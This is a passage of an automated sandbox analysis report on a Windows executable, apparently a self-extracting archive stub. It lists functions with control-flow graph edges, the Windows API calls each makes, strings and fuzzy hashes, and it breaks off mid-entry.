              • Opcode Fuzzy Hash: b9ee30f9026bc6f5d64ca10394c1aad4f29edfbb7996cdd8af2a308f74e08754
              • Instruction Fuzzy Hash: BE31A171185785ABE301DF20DC8AFAB7FACEB86704F000518F6519B2E2DB655904D7B6
              Function 00B9CE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 795 b9ce22-b9ce3a call b9e360 798 b9d08b-b9d093 795->798 799 b9ce40-b9ce4c call ba35b3 795->799 799->798 802 b9ce52-b9ce7a call b9f350 799->802 805 b9ce7c 802->805 806 b9ce84-b9ce91 802->806 805->806 807 b9ce93 806->807 808 b9ce95-b9ce9e 806->808 807->808 809 b9cea0-b9cea2 808->809 810 b9ced6 808->810 811 b9ceaa-b9cead 809->811 812 b9ceda-b9cedd 810->812 813 b9d03c-b9d041 811->813 814 b9ceb3-b9cebb 811->814 815 b9cedf-b9cee2 812->815 816 b9cee4-b9cee6 812->816 819 b9d043 813->819 820 b9d036-b9d03a 813->820 817 b9cec1-b9cec7 814->817 818 b9d055-b9d05d 814->818 815->816 821 b9cef9-b9cf0e call b8b493 815->821 816->821 822 b9cee8-b9ceef 816->822 817->818 823 b9cecd-b9ced4 817->823 825 b9d05f-b9d061 818->825 826 b9d065-b9d06d 818->826 824 b9d048-b9d04c 819->824 820->813 820->824 830 b9cf10-b9cf1d call b917ac 821->830 831 b9cf27-b9cf32 call b8a180 821->831 822->821 827 b9cef1 822->827 823->810 823->811 824->818 825->826 826->812 827->821 830->831 836 b9cf1f 830->836 837 b9cf4f-b9cf5c ShellExecuteExW 831->837 838 b9cf34-b9cf4b call b8b239 831->838 836->831 840 b9d08a 837->840 841 b9cf62-b9cf6f 837->841 838->837 840->798 843 b9cf71-b9cf78 841->843 844 b9cf82-b9cf84 841->844 843->844 847 b9cf7a-b9cf80 843->847 845 b9cf9b-b9cfba call b9d2e6 844->845 846 b9cf86-b9cf8f 844->846 848 b9cff1-b9cffd CloseHandle 845->848 865 b9cfbc-b9cfc4 845->865 846->845 854 b9cf91-b9cf99 ShowWindow 846->854 847->844 847->848 851 b9cfff-b9d00c call b917ac 848->851 852 b9d00e-b9d01c 848->852 851->852 862 b9d072 851->862 855 b9d079-b9d07b 852->855 856 b9d01e-b9d020 852->856 854->845 855->840 859 b9d07d-b9d07f 855->859 856->855 860 b9d022-b9d028 856->860 859->840 863 b9d081-b9d084 ShowWindow 859->863 860->855 864 b9d02a-b9d034 860->864 862->855 863->840 864->855 865->848 866 b9cfc6-b9cfd7 GetExitCodeProcess 865->866 866->848 867 b9cfd9-b9cfe3 866->867 868 b9cfea 867->868 869 b9cfe5 867->869 868->848 869->868
              APIs
              • ShellExecuteExW.SHELL32(?), ref: 00B9CF54
              • ShowWindow.USER32(?,00000000), ref: 00B9CF93
              • GetExitCodeProcess.KERNEL32(?,?), ref: 00B9CFCF
              • CloseHandle.KERNEL32(?), ref: 00B9CFF5
              • ShowWindow.USER32(?,00000001), ref: 00B9D084
                • Part of subcall function 00B917AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00B8BB05,00000000,.exe,?,?,00000800,?,?,00B985DF,?), ref: 00B917C2
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
              • String ID: $.exe$.inf
              • API String ID: 3686203788-2452507128
              • Opcode ID: 227570e0879bcc06e5e392627a8e0bba6f215d601ae456a838fd94fabe9ed596
              • Instruction ID: 7f3b1a7eee3936e965ab7bb012ceb0f033b25cd0522f112df66d06a7727912e8
              • Opcode Fuzzy Hash: 227570e0879bcc06e5e392627a8e0bba6f215d601ae456a838fd94fabe9ed596
              • Instruction Fuzzy Hash: 2F61F5705087809BDF319F25D864AABBFE9EF85300F0448BEF4C597261DBB19989CB52
              Function 00BAA058 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 870 baa058-baa071 871 baa073-baa083 call bae6ed 870->871 872 baa087-baa08c 870->872 871->872 882 baa085 871->882 874 baa099-baa0bd MultiByteToWideChar 872->874 875 baa08e-baa096 872->875 877 baa0c3-baa0cf 874->877 878 baa250-baa263 call b9ec4a 874->878 875->874 879 baa123 877->879 880 baa0d1-baa0e2 877->880 886 baa125-baa127 879->886 883 baa101-baa112 call ba8518 880->883 884 baa0e4-baa0f3 call bb1a30 880->884 882->872 890 baa245 883->890 896 baa118 883->896 884->890 895 baa0f9-baa0ff 884->895 889 baa12d-baa140 MultiByteToWideChar 886->889 886->890 889->890 893 baa146-baa158 call baa72c 889->893 894 baa247-baa24e call baa2c0 890->894 901 baa15d-baa161 893->901 894->878 900 baa11e-baa121 895->900 896->900 900->886 901->890 902 baa167-baa16e 901->902 903 baa1a8-baa1b4 902->903 904 baa170-baa175 902->904 906 baa200 903->906 907 baa1b6-baa1c7 903->907 904->894 905 baa17b-baa17d 904->905 905->890 908 baa183-baa19d call baa72c 905->908 909 baa202-baa204 906->909 910 baa1c9-baa1d8 call bb1a30 907->910 911 baa1e2-baa1f3 call ba8518 907->911 908->894 923 baa1a3 908->923 913 baa23e-baa244 call baa2c0 909->913 914 baa206-baa21f call baa72c 909->914 910->913 926 baa1da-baa1e0 910->926 911->913 922 baa1f5 911->922 913->890 914->913 928 baa221-baa228 914->928 927 baa1fb-baa1fe 922->927 923->890 926->927 927->909 929 baa22a-baa22b 928->929 930 baa264-baa26a 928->930 931 baa22c-baa23c WideCharToMultiByte 929->931 930->931 931->913 932 baa26c-baa273 call baa2c0 931->932 932->894
              APIs
              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00BA4E35,00BA4E35,?,?,?,00BAA2A9,00000001,00000001,3FE85006), ref: 00BAA0B2
              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00BAA2A9,00000001,00000001,3FE85006,?,?,?), ref: 00BAA138
              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00BAA232
              • __freea.LIBCMT ref: 00BAA23F
                • Part of subcall function 00BA8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BAC13D,00000000,?,00BA67E2,?,00000008,?,00BA89AD,?,?,?), ref: 00BA854A
              • __freea.LIBCMT ref: 00BAA248
              • __freea.LIBCMT ref: 00BAA26D
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ByteCharMultiWide__freea$AllocateHeap
              • String ID:
              • API String ID: 1414292761-0
              • Opcode ID: 3237a4c062fee5a61a68f500eefddfd51e14bd09ea998b2d2172e6ecd29286a9
              • Instruction ID: efa5fd3d063cf3801acf4f2d31144da29facbf83c15676f7ddcf8ec4760f6a65
              • Opcode Fuzzy Hash: 3237a4c062fee5a61a68f500eefddfd51e14bd09ea998b2d2172e6ecd29286a9
              • Instruction Fuzzy Hash: CB51E072618206AFEB259E64CC81FBF77E9EB46750F1446A9FC04E6140EB35DC60C6B2
              Function 00B899B0 Relevance: 7.6, APIs: 5, Instructions: 117filetimeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 935 b899b0-b899d1 call b9e360 938 b899dc 935->938 939 b899d3-b899d6 935->939 941 b899de-b899fb 938->941 939->938 940 b899d8-b899da 939->940 940->941 942 b899fd 941->942 943 b89a03-b89a0d 941->943 942->943 944 b89a0f 943->944 945 b89a12-b89a31 call b870bf 943->945 944->945 948 b89a39-b89a57 CreateFileW 945->948 949 b89a33 945->949 950 b89a59-b89a7b GetLastError call b8b66c 948->950 951 b89abb-b89ac0 948->951 949->948 960 b89aaa-b89aaf 950->960 961 b89a7d-b89a9f CreateFileW GetLastError 950->961 952 b89ae1-b89af5 951->952 953 b89ac2-b89ac5 951->953 956 b89b13-b89b1e 952->956 957 b89af7-b89b0f call b8fe56 952->957 953->952 955 b89ac7-b89adb SetFileTime 953->955 955->952 957->956 960->951 964 b89ab1 960->964 962 b89aa1 961->962 963 b89aa5-b89aa8 961->963 962->963 963->951 963->960 964->951
              APIs
              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00B878AD,?,00000005,?,00000011), ref: 00B89A4C
              • GetLastError.KERNEL32(?,?,00B878AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B89A59
              • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00B878AD,?,00000005,?), ref: 00B89A8E
              • GetLastError.KERNEL32(?,?,00B878AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B89A96
              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00B878AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B89ADB
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: File$CreateErrorLast$Time
              • String ID:
              • API String ID: 1999340476-0
              • Opcode ID: 3c799aa39e97e456a622444cf1cec40ba4884ec20fc071bc10b18d781d68a2d3
              • Instruction ID: 379b0a985adaed602c33c7d87c7d24f9682fcf8585c3053c3718985b003d2abd
              • Opcode Fuzzy Hash: 3c799aa39e97e456a622444cf1cec40ba4884ec20fc071bc10b18d781d68a2d3
              • Instruction Fuzzy Hash: F54166305447466FEB24AB20CC45BEABBD0FB01724F140759F5E4921E0E7B5A988CB91
              Function 00B9AC74 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 994 b9ac74-b9ac8d PeekMessageW 995 b9acc8-b9accc 994->995 996 b9ac8f-b9aca3 GetMessageW 994->996 997 b9aca5-b9acb2 IsDialogMessageW 996->997 998 b9acb4-b9acc2 TranslateMessage DispatchMessageW 996->998 997->995 997->998 998->995
              APIs
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B9AC85
              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B9AC96
              • IsDialogMessageW.USER32(00010442,?), ref: 00B9ACAA
              • TranslateMessage.USER32(?), ref: 00B9ACB8
              • DispatchMessageW.USER32(?), ref: 00B9ACC2
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: Message$DialogDispatchPeekTranslate
              • String ID:
              • API String ID: 1266772231-0
              • Opcode ID: 7576f0cdead6225b45f4834df2cc7a89ccf945c494078b8d5b24858116bcf029
              • Instruction ID: 593303fc2efb3e1525b85571ec6a75c15a5fe593531b60bba09b71bf6851d5fa
              • Opcode Fuzzy Hash: 7576f0cdead6225b45f4834df2cc7a89ccf945c494078b8d5b24858116bcf029
              • Instruction Fuzzy Hash: E1F01D71901169AB8F209BE19C8CDEB7FBCEE052517404455F805D7141EA34D505C7F1
              Function 00B9A2C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 999 b9a2c7-b9a2e6 GetClassNameW 1000 b9a2e8-b9a2fd call b917ac 999->1000 1001 b9a30e-b9a310 999->1001 1006 b9a30d 1000->1006 1007 b9a2ff-b9a30b FindWindowExW 1000->1007 1003 b9a31b-b9a31f 1001->1003 1004 b9a312-b9a315 SHAutoComplete 1001->1004 1004->1003 1006->1001 1007->1006
              APIs
              • GetClassNameW.USER32(?,?,00000050), ref: 00B9A2DE
              • SHAutoComplete.SHLWAPI(?,00000010), ref: 00B9A315
                • Part of subcall function 00B917AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00B8BB05,00000000,.exe,?,?,00000800,?,?,00B985DF,?), ref: 00B917C2
              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00B9A305
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AutoClassCompareCompleteFindNameStringWindow
              • String ID: EDIT
              • API String ID: 4243998846-3080729518
              • Opcode ID: bffcf8d10c9c281ebded9c6c0df2e9ffddf0aec6ab579657cbe364126b4284ec
              • Instruction ID: 501f10dc319dc1da2fe86ff9db50454e8493c9029d7336d939b4fd20e3a0ffff
              • Opcode Fuzzy Hash: bffcf8d10c9c281ebded9c6c0df2e9ffddf0aec6ab579657cbe364126b4284ec
              • Instruction Fuzzy Hash: 09F05E32A052286BEA2096649C09FAB77ACDB46B10F0400A6BD05A7181DB60A941C6EA
              Function 00B9A335 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35comCOMMON
              Download Yara Rule

              Control-flow Graph

              APIs
                • Part of subcall function 00B90085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B900A0
                • Part of subcall function 00B90085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B8EB86,Crypt32.dll,00000000,00B8EC0A,?,?,00B8EBEC,?,?,?), ref: 00B900C2
              • OleInitialize.OLE32(00000000), ref: 00B9A34E
              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B9A385
              • SHGetMalloc.SHELL32(00BC8430), ref: 00B9A38F
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
              • String ID: riched20.dll
              • API String ID: 3498096277-3360196438
              • Opcode ID: 66fc46d15ad88153dcdc4aaa74663de1962e22299328ba66ddd560c2a36b3e12
              • Instruction ID: 98e2a51bf111f8262ce6c715dc83aac025bf29e78a781babc8d246418d3ff802
              • Opcode Fuzzy Hash: 66fc46d15ad88153dcdc4aaa74663de1962e22299328ba66ddd560c2a36b3e12
              • Instruction Fuzzy Hash: 6BF0F9B1D0020DABCB10AF99D8499EFFBFCEF95711F0041AAE914E2251DBB456058BA1
              Function 00B9D287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1012 b9d287-b9d2b2 call b9e360 SetEnvironmentVariableW call b8fbd8 1016 b9d2b7-b9d2bb 1012->1016 1017 b9d2bd-b9d2c1 1016->1017 1018 b9d2df-b9d2e3 1016->1018 1019 b9d2ca-b9d2d1 call b8fcf1 1017->1019 1022 b9d2c3-b9d2c9 1019->1022 1023 b9d2d3-b9d2d9 SetEnvironmentVariableW 1019->1023 1022->1019 1023->1018
              APIs
              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00B9D29D
              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B9D2D9
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: EnvironmentVariable
              • String ID: sfxcmd$sfxpar
              • API String ID: 1431749950-3493335439
              • Opcode ID: 90f850878e65ae8e30e094448af17f54c85057858cf7c2833e005e28a600e1f5
              • Instruction ID: 44bcc167e886e9b008e244505982a88a2807bdd1448debd8aa8944909b2a4133
              • Opcode Fuzzy Hash: 90f850878e65ae8e30e094448af17f54c85057858cf7c2833e005e28a600e1f5
              • Instruction Fuzzy Hash: A2F08C72800228A7CB203FA5DC0AAFA7BDCEF09B41B4001E1FC84A6151DAA0CD40DBF1
              Function 00B8984E Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1024 b8984e-b8985a 1025 b8985c-b89864 GetStdHandle 1024->1025 1026 b89867-b8987e ReadFile 1024->1026 1025->1026 1027 b898da 1026->1027 1028 b89880-b89889 call b89989 1026->1028 1029 b898dd-b898e2 1027->1029 1032 b8988b-b89893 1028->1032 1033 b898a2-b898a6 1028->1033 1032->1033 1034 b89895 1032->1034 1035 b898a8-b898b1 GetLastError 1033->1035 1036 b898b7-b898bb 1033->1036 1037 b89896-b898a0 call b8984e 1034->1037 1035->1036 1038 b898b3-b898b5 1035->1038 1039 b898bd-b898c5 1036->1039 1040 b898d5-b898d8 1036->1040 1037->1029 1038->1029 1039->1040 1042 b898c7-b898d0 GetLastError 1039->1042 1040->1029 1042->1040 1043 b898d2-b898d3 1042->1043 1043->1037
              APIs
              • GetStdHandle.KERNEL32(000000F6), ref: 00B8985E
              • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00B89876
              • GetLastError.KERNEL32 ref: 00B898A8
              • GetLastError.KERNEL32 ref: 00B898C7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ErrorLast$FileHandleRead
              • String ID:
              • API String ID: 2244327787-0
              • Opcode ID: 5f9b01742fee6f8542adf61761f4980065a726cfdf3455d6713e6f545837d8db
              • Instruction ID: 82e797dd25141af96f661453ef14e800e993901f71ad52c784af8f5927d1e275
              • Opcode Fuzzy Hash: 5f9b01742fee6f8542adf61761f4980065a726cfdf3455d6713e6f545837d8db
              • Instruction Fuzzy Hash: 81118230900209EFDF207B51C844A7977E8FF06BB1F1886AAF46A865A0DB759E40DF61
              Function 00BAA4F4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00B8CFE0,00000000,00000000,?,00BAA49B,00B8CFE0,00000000,00000000,00000000,?,00BAA698,00000006,FlsSetValue), ref: 00BAA526
              • GetLastError.KERNEL32(?,00BAA49B,00B8CFE0,00000000,00000000,00000000,?,00BAA698,00000006,FlsSetValue,00BB7348,00BB7350,00000000,00000364,?,00BA9077), ref: 00BAA532
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00BAA49B,00B8CFE0,00000000,00000000,00000000,?,00BAA698,00000006,FlsSetValue,00BB7348,00BB7350,00000000), ref: 00BAA540
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: LibraryLoad$ErrorLast
              • String ID:
              • API String ID: 3177248105-0
              • Opcode ID: fecf54f2b3027c9ef3a7575364802953e51c14384b0da9c9932c70d34a8fd084
              • Instruction ID: d0db05f669563a5daaed5937c14f2dde0ec2ec4f615ca93585a6f6250a40cbe5
              • Opcode Fuzzy Hash: fecf54f2b3027c9ef3a7575364802953e51c14384b0da9c9932c70d34a8fd084
              • Instruction Fuzzy Hash: EE01F732A19226ABC7218A6C9C84A667BDCEF67FA17240664F906D7140DB31D900C6F5
              Function 00B89F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
              Download Yara Rule
              APIs
              • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,00B8CC94,00000001,?,?,?,00000000,00B94ECD,?,?,?), ref: 00B89F4C
              • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00B94ECD,?,?,?,?,?,00B94972,?), ref: 00B89F8E
              • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,00B8CC94,00000001,?,?), ref: 00B89FB8
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: FileWrite$Handle
              • String ID:
              • API String ID: 4209713984-0
              • Opcode ID: 02cd545ee5ee0c5e1e7c623dadfb8049ccfe4cea38ebf65809a8efadeab5445f
              • Instruction ID: 9ebcec629bfe7f4aeda2317fa26cefa817db13f4cdad89079f061c4c1d8452d7
              • Opcode Fuzzy Hash: 02cd545ee5ee0c5e1e7c623dadfb8049ccfe4cea38ebf65809a8efadeab5445f
              • Instruction Fuzzy Hash: EE31E4712083059BDF18AF14DC48B7ABBE8EF50B14F08469DF945DB1A1CB74E948CBA2
              Function 00B8A207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON
              Download Yara Rule
              APIs
              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00B8A113,?,00000001,00000000,?,?), ref: 00B8A22E
              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00B8A113,?,00000001,00000000,?,?), ref: 00B8A261
              • GetLastError.KERNEL32(?,?,?,?,00B8A113,?,00000001,00000000,?,?), ref: 00B8A27E
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: CreateDirectory$ErrorLast
              • String ID:
              • API String ID: 2485089472-0
              • Opcode ID: 18186207cab8e5f045d3017013133a024414c05c5d2eeb5385dde050bf218be7
              • Instruction ID: 3e2883de70ca855e1cabdb7bcd3007c94ed69f7fd1c0f2d1019135b057608e60
